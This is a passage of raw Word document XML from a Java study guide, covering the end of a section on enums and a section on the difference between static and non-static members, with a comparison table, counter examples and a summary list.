          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You cannot subclass enums.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE8890F" w14:textId="38A613A6" w:rsidR="00342FA5" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00C205E6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="401"/>
        </w:numPr>
        <w:jc w:val="both"/>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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Enums are a great way to ensure type safety</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and they provide built-in methods like values(), ordinal(), and valueOf().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B85514" w14:textId="2E22089C"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BC3B5CB">
          <v:rect id="_x0000_i1182" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ADE385D" w14:textId="05D9F20B" w:rsidR="00946676" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA2925">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="55" w:name="_Toc196307535"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Difference between static and non-static in java</w:t>
      </w:r>
      <w:r w:rsidR="00946676" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="55"/>
    </w:p>
    <w:p w14:paraId="5126170B" w14:textId="5B532485" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="008D1816">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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>static</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non-static</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> refer to whether a member (field or method) belongs to a specific instance of a class or to the class itself. Below is a detailed comparison between static and non-stati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3"/>
        <w:gridCol w:w="5001"/>
        <w:gridCol w:w="3540"/>
      </w:tblGrid>
      <w:tr w:rsidR="008D1816" w:rsidRPr="00CE4B95" w14:paraId="267F13CA" w14:textId="77777777" w:rsidTr="00F23F73">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3D4ED5AA" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="008D181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spect</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1467BE57" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="008D181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atic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6AFDD270" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="008D181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Non-Static (Instance)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008D1816" w:rsidRPr="00CE4B95" w14:paraId="30089F36" w14:textId="77777777" w:rsidTr="00F23F73">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="74270505"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Keyword</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="17F88C73"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s the static keyword</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3530E687"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keyword used</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008D1816" w:rsidRPr="00CE4B95" w14:paraId="0960FE21" w14:textId="77777777" w:rsidTr="00F23F73">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="55D0B01C"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Allocation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="420105AD"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hared among all instances of the class. Only one copy of the static member exists.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3C43A014"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ch instance of the class gets its own copy of non-static members.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008D1816" w:rsidRPr="00CE4B95" w14:paraId="41B1E877" w14:textId="77777777" w:rsidTr="00F23F73">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6901E9D0"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ing Mechanism</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0973C8C0"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be accessed using the class name (ClassName.member) or through an object.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="39E92EB7"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only be accessed through an object of the class.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008D1816" w:rsidRPr="00CE4B95" w14:paraId="65E95ADB" w14:textId="77777777" w:rsidTr="00F23F73">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="612FE9BB"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tance Requirement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0626963C"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oes not require an object instance to be accessed.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="115E3379"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quires an object instance to be accessed.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008D1816" w:rsidRPr="00CE4B95" w14:paraId="5A37C392" w14:textId="77777777" w:rsidTr="00F23F73">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="444F82B6"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ault Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="39566353"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tic variables are initialized only once and are shared among all instances.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="422D2D83"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n-static variables are initialized for each instance individually.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008D1816" w:rsidRPr="00CE4B95" w14:paraId="7FC3B47A" w14:textId="77777777" w:rsidTr="00F23F73">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="28568EBC"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Location</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1BAE7BD8"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ored in the </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>method area</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> (part of the class's memory).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0FD1D421"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ored in the </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>heap memory</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> (each object has its own copy).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008D1816" w:rsidRPr="00CE4B95" w14:paraId="77429EFB" w14:textId="77777777" w:rsidTr="00F23F73">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="11EF98E5"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 Invocation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2FC94450"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tic methods can be called directly using the class name.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="574E709A"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n-static methods must be called through an object instance.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008D1816" w:rsidRPr="00CE4B95" w14:paraId="076D487C" w14:textId="77777777" w:rsidTr="00F23F73">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="51D9F79F"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olymorphism</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="31FD7318"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not be overridden (in terms of dynamic method dispatch) but can be hidden (by re-declaring in a subclass).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="63351B82"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n-static methods can be overridden in subclasses.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008D1816" w:rsidRPr="00CE4B95" w14:paraId="51EA74E8" w14:textId="77777777" w:rsidTr="00F23F73">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="06827300"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fecycle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="55827215"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ists as long as the class is loaded in memory, even if no object is created.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="085F7A7B"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ists only as long as the object exists.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008D1816" w:rsidRPr="00CE4B95" w14:paraId="09620CDD" w14:textId="77777777" w:rsidTr="00F23F73">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2A93D946"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ase</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="050328FA"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st used for functionality that is independent of instance-specific data (e.g., utility methods, constants).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6547AA6D"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st used for instance-specific functionality (e.g., instance data manipulation).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="11943807" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="008D181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7E3631CA" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="008D181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atic Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00211D01"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Example {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11626457"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static int staticCount = 0; // Static field</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B02132" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="008D1816">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DF636DD"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tatic method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A3950E"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atic void increment() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="739A2528"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aticCount++;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B905F05"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C9A4DCE" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="008D1816">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76A7D5F0"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1FC74D01"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ccessing static member directly using class name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE1D9BC"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xample.increment();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="626AC7E1"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tatic count: " + Example.staticCount); // Output: Static count: 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3582E0A0"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8F02473"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FB3572D" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="008D181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Non-Static Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E241585"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Example {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="195A3D53"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instanceCount = 0; // Non-static field</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35EF60DC" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="008D1816">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B63AB3E"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Non-static method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79AD42C3"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increment() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E7197F"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stanceCount++;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC9CAEA"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A7A7289" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="008D1816">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2688D19B"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69DDE6FF"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xample obj1 = new Example();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F3AD9E"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xample obj2 = new Example();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F5825DF" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="008D1816">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13B19A95"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bj1.increment();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F83F872"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bj2.increment();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24DEF2FD" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="008D1816">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="181C8D45"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Instance count for obj1: " + obj1.instanceCount); // Output: Instance count for obj1: 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A64587D"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Instance count for obj2: " + obj2.instanceCount); // Output: Instance count for obj2: 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A36906"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600D074" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="008D181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849B5FD" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="008D181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Differences:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED783CF" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="008D1816">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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variables</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Shared by all instances of a class, whereas </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>non-static variables</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are specific to each instance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE89D14" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="008D1816">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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methods</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Can be called without creating an object of the class, whereas </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>non-static methods</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> require an object to be called.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72DECBEC" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="008D1816">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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methods</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> cannot access </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>instance variables</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> directly, while </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>non-static methods</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> can access both static and non-static variables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68421DC2" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="008D181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4B7C9396" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="008D1816">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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members</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> belong to the class itself, and there is only one copy of a static member shared across all instances.</w:t>
      </w:r>
    </w:p>
